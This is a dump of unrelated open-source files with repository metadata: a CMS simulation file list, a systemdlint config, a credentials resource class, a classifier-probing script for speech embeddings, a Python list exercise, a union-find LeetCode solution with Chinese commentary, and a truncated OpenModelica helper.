'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/D1C27EA2-9188-794D-96D2-2CB4283756C1.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/D1EF6BA6-BF00-2140-B2C4-AFE68A5EB7CF.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/D42AB40F-7F08-9C45-AAA8-5B4B38C3DA88.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/D5E9ED7F-5BAE-8B4B-AC1C-6BD94CF88ADB.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/D62C585F-9B28-434A-B04D-EFEE9BC3341E.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/D640A1C4-1835-5348-998B-41548CB10044.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/D74266F0-8D06-3143-B407-40B493E6E566.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/D7BD5925-3A45-5242-A5C9-8505A4E7BEFF.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/D8E7D3EF-0142-2747-AC78-3EEECF8C5215.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/DAD40A58-ED8C-6740-8D17-BDD329193FEA.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/DB94C023-24B7-024B-B88A-DCE09309D428.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/DB9A0129-9379-3A43-9A27-8DCD76D9B55A.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/DC18FBB8-4F4F-6944-9970-EAEC5E33CA16.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/DDD734D1-E81D-5741-8762-6B6C34EE2493.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/DE55D8BA-53B9-5C47-8251-B0D60CB16B56.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/E44AA023-DC39-214A-BA05-D6DD02D72FE5.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/E4535A81-0543-8941-A55E-B7D2EE833808.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/E4FE60CC-2D18-204A-9B04-ABF0520DCCCB.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/E548A806-229E-AD41-B7A7-C14C2F28A9D7.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/E5A74A33-85DB-E546-B066-CBFE476A92F8.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/E82D5FC6-A626-2347-8926-F6DFBCCA5E39.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/E898EC17-A87B-9A4D-AC2B-A476399EAE81.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/E9CBB961-60CD-4A49-A6BE-61AA1CBC7F0F.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/EA9ABA96-2E00-EC46-A4DF-91AB79AD412B.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/EB7F2520-8367-7942-B550-56C4CB8A46D8.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/ED415DDE-EDF7-D44F-90AD-C95CE1701757.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/ED6CAC39-6327-FD49-B61A-4EE8DC953058.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/ED77492C-BD36-8F47-9EB4-AEF6AF209FE1.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/EECA8C8D-171E-6546-B5F2-CF2E97037D78.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/F0C3B26D-18F1-3C47-9301-D444596A7AA4.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/F139BEA4-57BD-274A-B5C1-69F066973A30.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/F18E5ACD-038D-404A-A3D8-79AB45D2330A.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/F1B34BD2-6838-4540-A522-952E34E7BA97.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/F4502E01-60B3-9041-95A9-E0CCB243FD89.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/F46D8BFA-3792-2E49-B251-C3F3C2558797.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/F539CA69-C3C9-CF4C-A55F-F2FD5E3F5285.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/F643D3DE-2C8C-7441-8CB7-A8CCC07AB7CD.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/F6BC224F-A87C-D540-8E5A-FEB8FD80D5F0.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/F6BDB661-C232-6E4F-A924-CCE22C205A14.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/F7DE319C-15F3-A84E-858D-68B16625FBD6.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/F91E4FDE-BFE7-3247-BCA5-7E4272FA5D5A.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/F9F6BD03-2A46-9F4A-91A8-06694A812DE3.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/FA0D37AB-3DAC-344A-88C4-A48463262F43.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/FA5F013A-C060-6941-8157-4AA764036F16.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/FABCE777-5D68-3D42-8A9C-66F9558232C6.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/FADC1F54-331F-074F-BA50-A92E1873AA09.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/FD92F439-BB17-1044-ADA4-ADED6597059E.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/FD9A8C6C-201B-3A49-BBE0-EF277BEB233A.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/FE299960-E749-4E44-8C1B-E0A91965F0C8.root',
] )
| [
"noreply@github.com"
] | TreeMaker.noreply@github.com |
a15d8a2d61f046759905ecfabae1a224bd13de50 | 527af27858f7cd937915268ea0dccb9c793bace8 | /systemdlint/systemdlint/conf/knownMandatory.py | 8dec79cd6f0a8f4ee1d98f46115daceb4ffb8000 | [
"BSD-2-Clause"
] | permissive | priv-kweihmann/systemdlint | b382438564ff3cff73655da634d10903027f26c3 | d9909d2e2d970599bb2015e2a667d4debf063384 | refs/heads/master | 2023-04-12T20:26:42.106601 | 2021-12-21T09:51:24 | 2021-12-21T09:51:24 | 182,244,386 | 21 | 2 | BSD-2-Clause | 2020-10-23T18:17:24 | 2019-04-19T10:01:24 | Python | UTF-8 | Python | false | false | 291 | py | KNOWN_MANDATORY = {
"Unit": ["Description"],
"Address": ["Address"],
"BridgeFDB": ["MACAddress"],
"Mount": ["What", "Where"],
"NetDev": ["Name"],
"L2TPSession": ["Name"],
"Peer": ["Name"],
"IPv6AddressLabel": ["Label", "Prefix"],
"NextHop": ["Gateway"]
}
| [
"kweihmann@outlook.com"
] | kweihmann@outlook.com |
b7356056640093a86575c5fbc52bb527a04ea613 | bf3c0b0b2f5eed28043caa155f001bb656ed41a5 | /softboxen/client/resources/box/credentials.py | e70600381da6f261e27f63e660f92cde040fad0f | [
"BSD-3-Clause",
"BSD-2-Clause"
] | permissive | etingof/softboxen | 0787a004f13d7f3d19f4cbf090e55bc229b8470a | 2a7ba85669d563de9824e3962bd48a0849482e3f | refs/heads/master | 2023-03-27T16:56:14.460474 | 2020-04-18T12:30:11 | 2020-04-18T12:30:11 | 239,087,167 | 3 | 1 | BSD-2-Clause | 2020-06-26T06:50:37 | 2020-02-08T07:29:53 | Python | UTF-8 | Python | false | false | 624 | py | #
# This file is part of softboxen software.
#
# Copyright (c) 2020, Ilya Etingof <etingof@gmail.com>
# License: https://github.com/etingof/softboxen/LICENSE.rst
#
import logging
from softboxen.client.resources import base
LOG = logging.getLogger(__name__)
class Credentials(base.Resource):
"""Represent user credentials."""
protocol = base.Field('protocol')
user = base.Field('user')
password = base.Field('password')
class CredentialsCollection(base.ResourceCollection):
"""Represent a collection of users credentials."""
@property
def _resource_type(self):
return Credentials
| [
"etingof@gmail.com"
] | etingof@gmail.com |
a1c19537f19fd89cd2b759d8f619fd37a8036f0f | 8a029afcaee3080728be4648c96865d5847d3247 | /dnnseg/probe.py | 8669d1867ffe72d789110adeb84c7a1aa7918c3a | [] | no_license | coryshain/dnnseg | 623d8c3583a996e496e77123a3296c8731f40613 | 30eed4b031adb3fcef80f98c6f037fd993aa36ca | refs/heads/master | 2021-06-11T00:47:25.975714 | 2021-02-22T14:18:51 | 2021-02-22T14:18:51 | 143,957,434 | 10 | 7 | null | 2020-12-12T01:34:11 | 2018-08-08T03:41:41 | Python | UTF-8 | Python | false | false | 13,408 | py | import sys
import os
import math
import re
import numpy as np
import pandas as pd
from sklearn.ensemble import RandomForestClassifier
from sklearn.tree import DecisionTreeClassifier, export_graphviz
from sklearn.linear_model import LogisticRegression
from sklearn.neural_network import MLPClassifier
from sklearn.metrics import precision_score, recall_score, f1_score, accuracy_score
import pydot
from dnnseg.data import get_random_permutation, is_embedding_dimension
from dnnseg.util import stderr
def get_target_cols(
class_types=None,
lang=None,
):
if class_types is None:
class_types = []
elif isinstance(class_types, str):
class_types = class_types.split()
elif not (isinstance(class_types, list) or isinstance(class_types, tuple)):
class_types = [class_types]
out = []
for class_type in class_types:
if class_type == 'features':
if lang.lower().startswith('eng'):
target_col_names = ['syllabic', 'consonantal', 'sonorant', 'continuant', 'delayed_release', 'approximant',
'nasal', 'voice', 'spread_glottis', 'labial', 'round', 'labiodental', 'coronal',
'anterior', 'distributed', 'strident', 'lateral', 'dorsal', 'high', 'low', 'front',
'back',
'tense', 'stress', 'diphthong']
elif lang.lower().startswith('xit'):
target_col_names = ['consonantal', 'sonorant', 'continuant', 'delayed_release', 'approximant',
'trill', 'nasal', 'voice', 'spread_glottis', 'constricted_glottis', 'labial', 'round',
'labiodental', 'coronal', 'anterior', 'distributed', 'strident', 'lateral', 'dorsal',
'high', 'low', 'front', 'back', 'tense', 'implosive']
else:
target_col_names = [class_type]
else:
target_col_names = [class_type]
out += target_col_names
return out
def probe(
segment_table,
class_types,
lang=None,
classifier_type='mlp',
regularization_scale=0.001,
max_depth=None,
min_impurity_decrease=0.,
n_estimators=100,
n_folds=2,
units=100,
compare_to_baseline=False,
dump_images=False,
verbose=False,
name='probe',
outdir='./probe/'
):
if not os.path.exists(outdir):
os.makedirs(outdir)
target_col_names = get_target_cols(class_types, lang=lang)
X = segment_table
input_col_names = [c for c in X.columns if is_embedding_dimension.match(c)]
target_col_names_cur = []
df_cols = set(X.columns)
for target_col in target_col_names:
if target_col in df_cols:
target_col_names_cur.append(target_col)
else:
sys.stderr.write('Ignoring unrecognized target column "%s"...\n' % target_col)
sys.stderr.flush()
precision = {}
recall = {}
f1 = {}
accuracy = {}
precision_baseline = {}
recall_baseline = {}
f1_baseline = {}
accuracy_baseline = {}
out_dict = {}
if len(target_col_names_cur):
for target_col in target_col_names_cur:
if verbose:
stderr(' Variable: "%s"\n' % target_col)
X_cur = X[(~X[target_col].isnull()) & (~X[target_col].isin(['SIL', 'SPN']))]
fold_size = math.ceil(float(len(X_cur)) / n_folds)
if fold_size:
perm, perm_inv = get_random_permutation(len(X_cur))
y = X_cur[target_col]
if pd.api.types.is_string_dtype(y) or len(y.unique()) > 2:
avg_method = 'macro'
else:
avg_method = 'binary'
if y.sum() > len(y) / 2: # Majority class is positive, flip
y = 1 - y
label_set, label_counts = np.unique(y.values, return_counts=True)
label_probs = label_counts / label_counts.sum()
if verbose:
sys.stderr.write('\r Label proportions:\n')
sys.stderr.flush()
for level, prob in zip(label_set, label_probs):
sys.stderr.write('\r %s: %s\n' % (level, prob))
sys.stderr.flush()
predictions = []
gold = []
for j in range(0, len(X_cur), fold_size):
if verbose:
sys.stderr.write(
'\r Fold %d/%d...' % (int(j / fold_size) + 1, math.ceil(len(X_cur) / fold_size)))
sys.stderr.flush()
if classifier_type.lower() == 'random_forest':
classifier = RandomForestClassifier(
n_estimators=n_estimators,
criterion='entropy',
class_weight='balanced',
max_depth=max_depth,
min_impurity_decrease=min_impurity_decrease
)
elif classifier_type.lower() in ['mlr', 'logreg', 'logistic_regression']:
classifier = LogisticRegression(
class_weight='balanced',
C=regularization_scale,
solver='lbfgs',
multi_class='auto',
max_iter=100
)
elif classifier_type.lower() in ['mlp', 'neural_network']:
if isinstance(units, str):
units = [int(x) for x in units.split()]
if not (isinstance(units, list) or isinstance(units, tuple)):
units = [int(units)]
classifier = MLPClassifier(
units,
alpha=regularization_scale
)
train_select = np.ones(len(X_cur)).astype('bool')
train_select[j:j + fold_size] = False
cv_select = np.logical_not(train_select)
train_select = train_select[perm_inv]
X_train = X_cur[input_col_names][train_select]
y_train = y[train_select]
if len(y_train.unique()) < 2:
break
X_cv = X_cur[input_col_names][cv_select]
y_cv = y[cv_select]
classifier.fit(X_train, y_train)
predictions.append(classifier.predict(X_cv))
gold.append(y_cv)
if len(predictions):
predictions = np.concatenate(predictions, axis=0)
gold = np.concatenate(gold, axis=0)
precision[target_col] = precision_score(gold, predictions, average=avg_method)
recall[target_col] = recall_score(gold, predictions, average=avg_method)
f1[target_col] = f1_score(gold, predictions, average=avg_method)
accuracy[target_col] = accuracy_score(gold, predictions)
if verbose:
stderr('\n Cross-validation F1 for variable "%s": %.4f\n' % (target_col, f1[target_col]))
if compare_to_baseline:
predictions_baseline = np.random.choice(label_set, size=(len(gold),), p=label_probs)
precision_baseline[target_col] = precision_score(gold, predictions_baseline, average=avg_method)
recall_baseline[target_col] = recall_score(gold, predictions_baseline, average=avg_method)
f1_baseline[target_col] = f1_score(gold, predictions_baseline, average=avg_method)
accuracy_baseline[target_col] = accuracy_score(gold, predictions_baseline)
if verbose:
stderr(' Baseline F1 for variable "%s": %.4f\n' % (target_col, f1_baseline[target_col]))
if dump_images and classifier_type.lower() == 'random_forest':
tree_ix = np.random.randint(n_estimators)
graph = export_graphviz(
classifier[tree_ix],
feature_names=input_col_names,
class_names=['-%s' % target_col, '+%s' % target_col],
rounded=True,
proportion=False,
precision=2,
filled=True
)
(graph,) = pydot.graph_from_dot_data(graph)
img_str = '/%s_decision_tree_%s.png'
outfile = outdir + img_str % (name, target_col)
graph.write_png(outfile)
if len(precision):
macro_avg = {
'precision': sum(precision[x] for x in precision) / sum(1 for _ in precision),
'recall': sum(recall[x] for x in recall) / sum(1 for _ in recall),
'f1': sum(f1[x] for x in f1) / sum(1 for _ in f1),
'accuracy': sum(accuracy[x] for x in accuracy) / sum(1 for _ in accuracy)
}
if verbose:
stderr(' Model macro averages:\n')
stderr(' P: %.4f\n' % macro_avg['precision'])
stderr(' R: %.4f\n' % macro_avg['recall'])
stderr(' F1: %.4f\n' % macro_avg['f1'])
stderr(' ACC: %.4f\n' % macro_avg['accuracy'])
if compare_to_baseline:
macro_avg_baseline = {
'precision': sum(precision_baseline[x] for x in precision_baseline) / sum(
1 for _ in precision_baseline),
'recall': sum(recall_baseline[x] for x in recall_baseline) / sum(1 for _ in recall_baseline),
'f1': sum(f1_baseline[x] for x in f1_baseline) / sum(1 for _ in f1_baseline),
'accuracy': sum(accuracy_baseline[x] for x in accuracy_baseline) / sum(
1 for _ in accuracy_baseline)
}
if verbose:
stderr(' Baseline macro averages:\n')
stderr(' P: %.4f\n' % macro_avg_baseline['precision'])
stderr(' R: %.4f\n' % macro_avg_baseline['recall'])
stderr(' F1: %.4f\n' % macro_avg_baseline['f1'])
stderr(' ACC: %.4f\n' % macro_avg_baseline['accuracy'])
path_str = '/%s_classifier_scores.txt'
outfile = outdir + path_str % name
with open(outfile, 'w') as f:
f.write('feature precision recall f1 accuracy\n')
for c in sorted(list(f1.keys())):
f.write('%s %s %s %s %s\n' % (c, precision[c], recall[c], f1[c], accuracy[c]))
f.write('MACRO %s %s %s %s\n' % (macro_avg['precision'], macro_avg['recall'], macro_avg['f1'], macro_avg['accuracy']))
if compare_to_baseline:
path_str = '/%s_baseline_scores.txt'
outfile = outdir + path_str % name
with open(outfile, 'w') as f:
f.write('feature precision recall f1 accuracy\n')
for c in sorted(list(f1.keys())):
f.write('%s %s %s %s %s\n' % (
c, precision_baseline[c], recall_baseline[c], f1_baseline[c], accuracy_baseline[c]))
f.write('MACRO %s %s %s %s\n' % (
macro_avg_baseline['precision'], macro_avg_baseline['recall'], macro_avg_baseline['f1'],
macro_avg_baseline['accuracy']))
for c in sorted(list(f1.keys())):
key_base = '_'.join([name, c])
out_dict[key_base + '_p'] = precision[c]
out_dict[key_base + '_r'] = recall[c]
out_dict[key_base + '_f1'] = f1[c]
if compare_to_baseline:
out_dict[key_base + '_baseline_p'] = precision_baseline[c]
out_dict[key_base + '_baseline_r'] = recall_baseline[c]
out_dict[key_base + '_baseline_f1'] = f1_baseline[c]
out_dict['_'.join([name, 'macro_p'])] = macro_avg['precision']
out_dict['_'.join([name, 'macro_r'])] = macro_avg['recall']
out_dict['_'.join([name, 'macro_f1'])] = macro_avg['f1']
out_dict['_'.join([name, 'macro_acc'])] = macro_avg['accuracy']
if compare_to_baseline:
out_dict['_'.join([name, 'baseline_macro_p'])] = macro_avg_baseline['precision']
out_dict['_'.join([name, 'baseline_macro_r'])] = macro_avg_baseline['recall']
out_dict['_'.join([name, 'baseline_macro_f1'])] = macro_avg_baseline['f1']
out_dict['_'.join([name, 'baseline_macro_acc'])] = macro_avg_baseline['accuracy']
if verbose:
sys.stderr.write('\n')
sys.stderr.flush()
return out_dict
| [
"cory.shain@gmail.com"
] | cory.shain@gmail.com |
3be2027bbed138e20adad4a399187c7b472f9d7d | da280a226bbf15d7243410c0d3930bdca00d0088 | /ex39.py | cf0099096111e4cca29e493f9986359bfb0cb6c5 | [] | no_license | c4collins/PyTHWay | 174cae57c73431ce5bfc90a361613c5db5c846d7 | 135b4b908ef2698084ee1b3fb9f1e5550c3c8843 | refs/heads/master | 2021-01-10T18:29:43.998528 | 2012-11-03T22:53:17 | 2012-11-03T22:53:17 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 573 | py | ten_things = "Apples Oranges Crows Telephone Light Sugar"
print "Wait there's not 10 things in that list, let's fix that."
stuff = ten_things.split(' ')
more_stuff = ["Day", "Night", "Song", "Frisbee", "Corn", "Banana", "Girl", "Boy"]
while len(stuff) != 10:
next_one = more_stuff.pop()
print "Adding: ", next_one
stuff.append(next_one)
print "There's %d items now." % len(stuff)
print "There we go: ", stuff
print "Let's do some more things with stuff."
print stuff[1]
print stuff[-1]
print stuff.pop()
print ' '.join(stuff)
print '#'.join(stuff[3:5])
| [
"connor.collins@gmail.com"
] | connor.collins@gmail.com |
3f723df5d615220111afdd7537c425100cc9e621 | e7b7505c084e2c2608cbda472bc193d4a0153248 | /LeetcodeNew/python/LC_765.py | 022d0738c948efc1eee48d7400433fe08f690773 | [] | no_license | Taoge123/OptimizedLeetcode | 8e5c1cd07904dfce1248bc3e3f960d2f48057a5d | 3e50f6a936b98ad75c47d7c1719e69163c648235 | refs/heads/master | 2023-02-27T21:13:40.450089 | 2023-02-07T04:11:09 | 2023-02-07T04:11:09 | 170,044,224 | 9 | 3 | null | null | null | null | UTF-8 | Python | false | false | 3,098 | py | """
https://leetcode.com/problems/couples-holding-hands/discuss/535314/Python-DFS-solution-with-detailed-explanation
https://leetcode.com/problems/couples-holding-hands/discuss/822501/Python-99-DFS-SCC
下面我们来看一种使用联合查找Union Find的解法。该解法对于处理群组问题时非常有效,比如岛屿数量有关的题就经常使用UF解法。核心思想是用一个root数组,每个点开始初始化为不同的值,如果两个点属于相同的组,就将其中一个点的root值赋值为另一个点的位置,这样只要是相同组里的两点,通过find函数会得到相同的值。 那么如果总共有n个数字,则共有 n/2 对儿,所以我们初始化 n/2 个群组,我们还是每次处理两个数字。每个数字除以2就是其群组号,那么属于同一组的两个数的群组号是相同的,比如2和3,其分别除以2均得到1,所以其组号均为1。那么这对解题有啥作用呢?作用忒大了,由于我们每次取的是两个数,且计算其群组号,并调用find函数,那么如果这两个数的群组号相同,那么find函数必然会返回同样的值,我们不用做什么额外动作,因为本身就是一对儿。如果两个数不是一对儿,那么其群组号必然不同,在二者没有归为一组之前,调用find函数返回的值就不同,此时我们将二者归为一组,并且cnt自减1,忘说了,cnt初始化为总群组数,即 n/2。那么最终cnt减少的个数就是交换的步数,还是用上面讲解中的例子来说明吧:
[3 1 4 0 2 5]
最开始的群组关系是:
群组0:0,1
群组1:2,3
群组2:4,5
取出前两个数字3和1,其群组号分别为1和0,带入find函数返回不同值,则此时将群组0和群组1链接起来,变成一个群组,则此时只有两个群组了,cnt自减1,变为了2。
群组0 & 1:0,1,2,3
群组2:4,5
此时取出4和0,其群组号分别为2和0,带入find函数返回不同值,则此时将群组0 & 1和群组2链接起来,变成一个超大群组,cnt自减1,变为了1
群组0 & 1 & 2:0,1,2,3,4,5
此时取出最后两个数2和5,其群组号分别为1和2,因为此时都是一个大组内的了,带入find函数返回相同的值,不做任何处理。最终交换的步数就是cnt减少值
"""
class UnionFind:
def __init__(self, n):
self.parent = [i for i in range(n)]
self.count = n // 2
def find(self, i):
if self.parent[i] == i:
return self.parent[i]
return self.find(self.parent[i])
def union(self, i, j):
x = self.find(i)
y = self.find(j)
if x != y:
self.count -= 1
self.parent[x] = y
class Solution:
def minSwapsCouples(self, row) -> int:
n = len(row)
uf = UnionFind(n)
for i in range(0, n, 2):
uf.union(row[i] // 2, row[i + 1] // 2)
return n // 2 - uf.count
"""
[3, 2, 0, 1]
1 1 0 0
row = [0, 2, 1, 3]
0 1 0 1
"""
| [
"taocheng984@gmail.com"
] | taocheng984@gmail.com |
247b93c47254775bb6f5dca6bdf3424e935aedbb | 14e2732db8f51176cc6394b4967868dd41b0ea97 | /src/inout/modelica/InitModelOMC.py | 91d3555d781d92aacbef5ab4a42e08efab7dd070 | [] | no_license | fran-jo/EngineSSE | 0c29db6db71499425738b22bb617f95e606f5b2e | 0878947aefb68f5e13d2cefd2dee2ef5e293f4d8 | refs/heads/master | 2020-03-23T21:02:40.605127 | 2018-07-23T23:11:42 | 2018-07-23T23:11:42 | 142,077,897 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,653 | py | '''
Created on 11 apr 2014
@author: fragom
'''
class InitModelOMC(object):
'''
classdocs
'''
def __init__(self):
'''
Constructor
'''
def loadFile(self, _path, _model):
strcommand = []
strcommand.append('loadFile(')
